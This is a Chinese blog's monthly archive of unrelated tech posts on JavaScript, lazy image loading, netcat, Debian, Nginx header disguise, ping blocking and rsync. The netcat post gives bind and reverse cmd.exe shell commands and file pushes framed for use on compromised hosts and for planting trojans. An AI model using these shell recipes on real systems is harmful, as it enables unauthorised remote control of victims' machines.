月度归档:2011年04月

能说明你的Javascript技术很烂的五个原因

本文是从 5 Reasons Your Javascript Stinks 这篇文章翻译而来。

Javascript在互联网上名声很臭,但你又很难再找到一个像它这样如此动态、如此被广泛使用、如此根植于我们的生活中的另外一种 语言。它的低学习门槛让很多人都称它为学前脚本语言,它另外一个让人嘲笑的东西是动态语言的概念是偏偏使用了高标准的静态数据类型。其实,你和 Javascript都站错了立场,而现在,你让Javascript很生气。这里有五个原因能说明你的Javascript技术很烂。

1. 你没有使用命名空间。

是否还记得在大学里老师告诉你不要在家庭作业里使用全局变量?Javascript里的全局变量的使用方法也不例外。Web网页稍不留神就会变的混 乱不堪、到处都是从互联网上各个角落里找来的乱糟糟的相互侵犯的脚本和脚本库。如果你把一个变量命名成loader(),那你是成心自找麻烦。如果你在无 意识的情况下重载了一个函数,Javascript根本不会提醒你。你还把它叫做一种学前教育编程语言,还记得吧?我要说的是,你需要知道在做了这些后发 生什么情况。

function derp() { alert(“one”); }
function derp() { alert(“two”); }
derp();

“two”,答案是“two”。并不是一定会这样,它也可能是“one”。所以,把你所有的代码都放在自己的命名空间里,这很容易。下面是定义自己的命名空间的一个简单做法。

var foospace={};
foospace.derp=function() { alert(“one”); }
function derp() { alert(“two”); }
foospace.derp();

2. 你在变戏法,你把变量定义的东一个西一个。

你使用莫名其妙的数字字母组合作为变量名是一个双输的结局。在40行的代码块了中寻找一个不带任何表意的字符变量,对于维护工作来说简直是场噩梦。 把对变量的第一次声明混合到一个40行的代码块里同样也是一场噩梦。即使你自己遇到这样的变量时,你也要不由的问自己:“这是在哪里定义的?”,然后迅速 的使用Ctrl+F组合在源代码里寻找这个变量最初定义的位置。不,不要这样,相反,这是对Javascript的滥用,是一种愚蠢的做法。你应该始终把 变量定义在它的使用范围的顶部。并不能说因为这不是必须的,你就可以不这样做。

function() {
var a, //description
b; //description
//process…
}

3. 你没有理解Javascript的变量范围。

你是个天才的程序员,你吃的是C++、拉的是List。你知道什么是变量范围,你对你的变量有完全的控制,你就像太上皇似的的注视着它们。然而,Javascript却在你的咖啡里拉了一泡屎,并且大笑不止。

var herp=”one”;
{
var herp=”two”;
}
alert(herp);

在这种情况下你得到的herp不是“one”,而是“two”。Javascript的变量有效范围并不是跟其它语言一样依赖于代码块。Javascript的变量范围是以函数为基础的。每个函数都有它自己的变量范围,Javascript这一点上表现的很酷,根本不理睬这毫无意义的花括弧包起来的范围。事实上,Javascript是如此的酷,以至于你甚至可以将变量范围像命名空间或变量那样进行传递。

4. 你以为Javascript的面向对象特征只是嫁接而来的。

Javascript,自从呱呱落地起,它就是一个面向对象的语言。所有的东西在Javascript里都是对象,所有的!甚至数字和字符这样的文 字符号都可以通过它自身固有的构造器转化成对象。跟其它面向对象的语言比起来,Javascript的不同之处在于,它没有类(class)。 Javascript对象像函数那样定义,甚至函数自己也是对象。Javascript有个属性叫做prototype,所有对象里都内置了这个属性,你可以通过它来改变对象的构造,修改对象、添加更多的变量、更多的功能。

var derp; // will hold a Herp instance
var Herp= function() {
this.opinion=”Javascript is cooler than BASIC.”;
}
Herp.prototype.speak=function() { alert(this.opinion); }
var derp= new Herp();
derp.speak();

如果这个看起来跟你毫不相干,我愿意介绍我的好朋友Google给你,Google擅长于帮助人们学习知识。面向对象对于我这篇简短的、低姿态的文章来说实在是个太大的话题。

5. 你使用“new”关键字时就像是盲人瞎马。

Javascript肯定是你的初恋女友,因为你显得无所适从。如果你想像真人那样取悦Javascript,你需要去了解对象符号。除了在需要实例化一个对象,或罕见的需要延时加载数据的情况外,你基本上不需要使用new关键字。在Javascript里分配大量的new变量地址是一项很慢的操作,为了效率起见,你应该始终使用对象符号。

var rightway= [1, 2, 3];
var wrongway= new Array(1, 2, 3);

是否还记得我说过Javascript的变量范围是以函数为基础的?是否还记得有人说Javascript的对象像函数那样定义?如果你不使用new关键字来声明一个对象,你将会使这个对象成为全局范围内的对象。所以,永远使用new关键字来声明对象是一个好习惯。

var derp=”one”;
var Herp=function() {
this.derp=”two”;
}
var foo=Herp();
alert(derp);

如果你这样写,Javascript并不会在意,而你真正弹出的答案是“two”!有很多方法可以防止对象做出这样的行为,可以以使用instanceOf,但更好的方法是正确的使用new关键字,这样显得更专业。

现在你知道你的Javascript代码写的很烂了吧,如果你记住了上面所说的东西,你的代码就会有所改善。我喜欢用3个tab键来缩进代码,我喜 欢用下划线来连接单词,我喜欢把函数名首字母大写来表示它是对象。当然,这个是另外一场讨论了。有很多原因会导致你的Javascript代码写的很烂, 就像我有很多技术很烂一样,所以,尽情的在评论里表达你的意见,支持,反对,不吝赐教。

非常感谢rogeliorv 和 Jared Wein指出第五点中存在的错误。你们很强。

jquery.lazyload 实现图片延迟加载(转)

看到了淘宝产品介绍中,图片是在下拉滚动条时加载,这是一个很不错的用户体验。减少了页面加载的时间了,也减轻了服务器的压力,就查了下用JQuery..

 

什么是ImageLazyLoad技术
在页面上图片比较多的时候,打开一张页面必然引起与服务器大数据量的交互。尤其是对于高清晰的图 片,占的几M的空间。ImageLazyLoad技术就是,当前可见界面的图片是加载进来的,而不可见页面(通过滚动条下拉可见)中的图片是不加载的,这 样势必会引起速度上质的提升。
怎么实现ImageLazyLoad
一、使用JQuery插件 ,插件名: jquery.lazyload(7kb大小),压缩后(3kb大小)

在线压缩js http://closure-compiler.appspot.com/home
虽然是很牛X的特效,不过用JQuery插件只需要短短几句代码,使用过程如下:
1.导入JS插件
<script src="jquery.js" type="text/javascript"></script>
<script src="jquery.lazyload.js" type="text/javascript"></script>
2.在你的页面中加入如下的javascript:
$("img").lazyload();
这将会使所有的图片都延迟加载。

当然插件还有几个配置项可供设置。
1.改变threshold
$(“img”).lazyload({ threshold : 200 });
把阀值设置成200 意思就是当图片没有看到之前先load 200像素。

2.当然了你也可以通过设置占位符图片和自定事件来触发加载图片事件
复制代码
代码如下:

$("img").lazyload({
placeholder : "img/grey.gif",
event : "click"
});

3.可以通过定义effect 参数来定义一些图片显示效果
复制代码
代码如下:

$("img").lazyload({
placeholder : "img/grey.gif",
effect : "fadeIn"
});

LazyLoad(延迟加载)技术不仅仅用在对网页中图片的延迟加载,对数据同样可以,Google Reader和Bing图片搜索就把
LazyLoad技术运用的淋漓尽致;
缺陷:
1.与Ajax技术的冲突;
2.图片的延迟加载,遇到高度特别高的图片,会出现停止加载的问题;
3.写代码不规范的同学要注意了,不管由于什么原因,如果您的页面中,img标签的height属性未定义,那么我建议您最好不要使用ImageLazyLoad
大家可以直接采用淘宝的延迟加载技术:(2kb大小)
http://a.tbcdn.cn/kissy/1.0.0/build/imglazyload/imglazyload-min.js
调用方法也是很简单的:
<script src="http://a.tbcdn.cn/kissy/1.0.0/build/imglazyload/imglazyload-min.js"
type="text/javascript"></script> <script type="text/javascript">// <![CDATA[KISSY.ImageLazyload();// ]]></script>
注:该脚本依赖 yahoo-dom-event, 页面中需要加载 yui 2.x,你也可以直接引用下面的地址:
<script src="http://kissy.googlecode.com/svn/trunk/third-party/yui2/yahoo-dom-event/yahoo-dom-event.js" type="text/javascript"></script>
配置参数如下:
复制代码
代码如下:

<script type="text/javascript">
KISSY.ImageLazyload({
mod: "manual", // 延迟模式。默认为 auto
diff: 200 // 当前屏幕下多远处的图片开始延迟加载。默认两屏外的图片才延迟加载
});
</script>

manual 模式时,需要手动将页面中需要延迟加载的图片的 src 属性名更改为 data-lazyload-src. 比如 SRP 页面,宝贝列表的后20个图片延迟加载。 输出时,html 代码为:

<img data-lazy-src="path/to/img" alt="something" />

如果您是Jquery,Prototype等这些JS框架的粉丝,他们都有定制的LazyLoad Plugin提供;

可查看http://www.appelsiini.net/projects/lazyload

LazyLoad(延迟加载)技术不仅仅用在对网页中图片的延迟加载,对数据同样可以,Google Reader和Bing图片搜索就把
LazyLoad技术运用的淋漓尽致;

nc的一些用法

-h 查看帮助信息
-d 后台模式
-e prog程序重定向,一但连接就执行[危险]
-i secs延时的间隔
-l 监听模式,用于入站连接
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C
-n IP地址,不能用域名
-o film记录16进制的传输
-p [空格]端口 本地端口号
-r 随机本地及远程端口
-t 使用Telnet交互方式
-u UDP模式
-v 详细输出,用-vv将更详细
-w 数字 timeout延时间隔
-z 将输入,输出关掉(用于扫锚时)

先讲讲一些简单的用法:

nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
nc -l -p 80 开启本机的TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口

高级用法:

nc -L -p 3389 做蜜罐,不停地监听3389端口
nc -L -p 3389>c:\log.txt 做蜜罐,不停地监听3389端口,同时把结果输出到c:\log.txt
nc -L -p 3389<c:\ftp.txt 不停地监听3389端口,并把c:\ftp.txt中内容发给连接本端口的主
机,可起到传送文件作用.(此用法经常用于反向溢出)
nc -l -p 2008 -t -e cmd.exe 绑定主机的cmd到2008端口,并以TELNET方式应答。
nc -t -e cmd.exe 192.168.0.2 555 绑定cmd反向连接192.168.0.2的555端口以TELNET方式应答。

组合用法:

1.溢出用:
nc -L -p 8989<c:\ftp.txt (ftp.txt中为FTP自动下载命令)
效果:一但溢出的主机连接8989端口就会自动用FTP下载指定的文件,如木马.(此法经常用于批量溢出)
2.返回CMD SHELL用:
正向连接:
在远程主机上运行 nc -l -p 2008 -t -e cmd.exe
本机运行 nc -nvv 192.168.0.1 2008
连接成功就会返回一个CMD shell。(类似TELNET)
反向连接:
先在本机运行 nc -l -p 2008
在远程主机上运行 nc -t -e cmd.exe 192.168.0.2 2008
连接成功就会得到一个CMD shell。(类似TELNET)
3.上传文本
本机运行 nc -vv www.baidu.com 80<1.txt (此法经常用于上传ASP木马)
本机运行 nc -nvv 192.168.0.1 80<1.txt (向192.168.0.1发送1.txt中的内容)

 

 

命令1:监听命令
nc -l -p port
nc -l -p port > e:/log.dat
nc -l -v -p port
参数解释:
-l:监听端口,监听入站信息
-p:后跟本地端口号
-v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息
提示:一般大家都爱用-vv
nc -l -p 80
这个很简单,监听80端口
如果机器上运行这个命令,端口80被认为是开放的,可以欺骗很多扫描器的哦!
nc -l -p 80 > e:/log.dat
呵呵,功能和上边一样,但是后边加了个“> e:/log.dat”我想,学过ECHO
那个命令的人都会知道吧,是在E盘创建一个log.dat的日志文件
nc -l -v -p 80
和上边命令相似,不过这次不是记录在文件里,而是会直接显示在运行着NC
的屏幕上。
nc -l -v -p 80
然后在浏览器中输入本机IP:127.0.0.1
同样,上边两个也是一样,大家自己试验一下吧

命令2:程序定向
nc -l -p port -t -e cmd.exe
本地机: nc -l -p port 或 nc -l -v -p port
目标机:nc -e cmd.exe ip port
参数解释:
-l、-p两个参数已经解释过了
-e;作用就是程序定向
-t:以telnet的形式来应答
例子
nc -l -p 5277 -t -e cmd.exe
知道运行在哪里吗?千万不要运行在自己的机器上,如果运行了,你机器
就会变成一台TELNET的服务器了,呵呵,解释一下:监听本地端口5277的
入站信息,同时将CMD.exe这个程序,重定向到端口5277上,当有人连接的时候,就让程序CMD.exe以
TELNET的形式来响应连接要求。
说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。。
呵呵,咱们来找台肉鸡试试,我TELNET IP 5277
(本地主机)local machine:nc -l -p port ( or nc -l -v -p port )
(远程主机)remote machine:nc -e cmd.exe ip port
大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马,
什么叫反弹端口?就是说,当对方中马后,不用你主动和对方连接,也就是说
不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你
这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。
这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。

nc -l -p 5277 (监听本地5277端口)
同样也可以用
nc -l -v -p 5277
运行在本地
然后在远程机器上,想办法运行
nc -e cmd.exe ip 5277
呵,看看在本地机器上出现了什么?
这样就是反弹~~在本地机器上得到了一个SHELL

命令3:扫描端口
nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port
参数解释:
-z:将输入输出关掉,在扫描时使用
nc -v ip port
这个命令是针对某一个端口进行扫描
例如:
nc -v ip 135
扫描远程主机的135端口,这样获得了该端口的一些简单信息,但是针对某些端口,我们还可以获得更多

的信息
例如:80端口
我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息
nc -v -z ip port-port
这个命令是用来扫描的一个命令,这个命令用于快速扫描TCP端口,而port-port则是指定了扫描的端口范

例如:
nc -v -z ip 1-200
可以看到我机器上的1-200的TCP端口的开放情况
nc -v -z -u ip port-port
这个命令比上个命令多了个-u,这个命令的作用仍然是扫描端口,只是多了一个-u的参数,是用来扫UDP

端口的
例如:
nc -v -z -u ip 1-200
这个命令就会扫1-200的UDP端口

命令4:传送文件(HOHO,I LIKE)
(本地主机)LOCAL MACHINE:nc -v -n ip port < e:/hack/pulist.exe

(远程主机)REMOTE MACHINE:nc -v -l -p port > c:/pulist.exe
参数解释:
-n:指定数字的IP地址
这两个命令结合起来是用来传送文件的
首先,在远程机上运行命令:
nc -v -l -p 5277 > c:/pulist.exe
这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口
并把接受到的信息数据写到c:/pulist.exe中
这时候在本地机上运行
nc -v -n ip 5277 < e:/hack/pulist.exe
这个命令的意思就是,从本地E盘跟目录中读取pulist.exe文件的内容,并把这些数据发送到ip的5277端
口上这样远程主机就会自动创建一个pulist.exe文件

debian linux5 ls 不显示颜色

debian linux 5安装好后,默认情况下root用户的ls是不显示颜色的,而普通用户的ls是显示颜色的。
习惯用颜色区分目录还是文件,
root用户打开文件~/.bashrc。找到如下几行:
#cd
#vim .bashrc

# You may uncomment the following lines if you want `ls’ to be colorized:
export LS_OPTIONS=’–color=always’
 eval "`dircolors`"
 alias ls=’ls $LS_OPTIONS’
 alias ll=’ls $LS_OPTIONS -l’
 alias l=’ls $LS_OPTIONS -lA’
按照第一行所说,将下面五行的注释去掉,则ls命令将显示颜色。但颜色可能很古怪,也许很正常,总之,不是我们自己根据自己对颜色的喜好定置的。
要定制自己喜欢的颜色,可如下操作:
dircolors -p >~/.colourrc
这将在root用户根目录下生成.colourrc文件,这个文件的注释极其详细,按照注释,修改颜色参数可定制颜色。然后,将上面红色的一行改变为:
eval "`dircolors .colourrc`"
运行source ~/.colourrc命令。
好了,ls可按照定制的颜色显示了。

修改Nginx源码伪装服务器

有时候为了伪装自己的真实服务器环境.
不像让对方知道自己的webserver真实环境,就不得不修改我们的webserer软件了!
今天看了一下baidu.com的webserver感觉像是nginx修改的.
C:curl-7.18.0&gt;curl.exe -I [url]www.baidu.com[/url]
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2008 05:00:39 GMT
Server: BWS/1.0
Content-Length: 3022
Content-Type: text/html
Cache-Control: private
Expires: Tue, 11 Mar 2008 05:00:39 GMT
Set-Cookie: BAIDUID=41BB2845D3E8BC1AEE99D4CECB90C50A:FG=1; expires=Tue, 11-
8 05:00:39 GMT; path=/; domain=.baidu.com
P3P: CP=" OTI DSP COR IVA OUR IND COM "

哈只是感觉,人家有坚强的开发后盾,可能是自己开发的!

于是自己翻了一下nginx源码了,发现竟然很容修改就可以实现.
cd /usr/local/src/nginx-0.5.35/src/core/

CODE:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[root@zyatt core]# cat nginx.h

/*
* Copyright (C) Igor Sysoev
*/

#ifndef _NGINX_H_INCLUDED_
#define _NGINX_H_INCLUDED_

#define NGINX_VERSION      "1.0"
#define NGINX_VER          "LPKWS/" NGINX_VERSION

#define NGINX_VAR          "LPKWS"
#define NGX_OLDPID_EXT     ".oldbin"

#endif /* _NGINX_H_INCLUDED_ */

测试效果
C:curl-7.18.0>curl.exe -I 211.100.11.122/info.php  (此Nginx没有做优化,配置expires,gzip等,仅为测试)

CODE:

1
2
3
4
5
6
7
8
HTTP/1.1 200 OK
Server: LPKWS/1.0
Date: Tue, 11 Mar 2008 04:53:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.4

  哈,仅为娱乐,要想真正的优化和安全考虑,还是应该好好读读源代码,踏踏实实做好细节工作!

linux禁止ping

运行以下命令

#sysctl -w net.ipv4.icmp_echo_ignore_all=1
#sysctl -p

以root进入Linux系统,然后编辑文件icmp_echo_ignore_all

vi /proc/sys/net/ipv4/icmp_echo_ignore_all
将其值改为1后为禁止PING
将其值改为0后为解除禁止PING

上面的可以禁ping 但是你自己也无法ping别人

而且系统出现错误提示:

error: "Operation not permitted" setting key "net.ipv4.icmp_echo_ignore_all"

没办法,修改iptables禁止ping入

完美方法 用iptables禁止

如果要自己能ping人家,而人家不能ping你,可以:
iptables -A INPUT -p icmp –icmp-type 8 -s 0/0 -j DROP
iptables -A INPUT -p icmp –icmp-type 0 -s 0/0 -j ACCEPT
iptables -A OUTPUT -p icmp –icmp-type 0 -s localip -j DROP
iptables -A OUTPUT -p icmp –icmp-type 8 -s localip -j DROP

localip为允许ping 放ip,如要允许ip为192.168.1.100的主机ping通,则是:
iptables -A OUTPUT -p icmp –icmp-type 0 -s 192.168.1.100 -j DROP
iptables -A OUTPUT -p icmp –icmp-type 8 -s 192.168.1.100 -j DROP

rsync同步出错error 122 解决

局域网同步测试出现以下错误信息:
vm_server:~/tongbu# rsync a.txt root@192.168.1.193::tongbu
rsync: failed to connect to 192.168.1.193: No route to host (113)
rsync error: error in socket IO (code 10) at clientserver.c(122) [sender=3.0.7]
vm_server:~/tongbu# rsync a.txt root@192.168.1.193::tongbu

原来是目标服务器开了防火墙,把目标服务器:192.168.1.193的防火墙关了就行了,
# service iptables stop
其实这只是把tcp udp 的873端口打开,我这是偷懒的方法。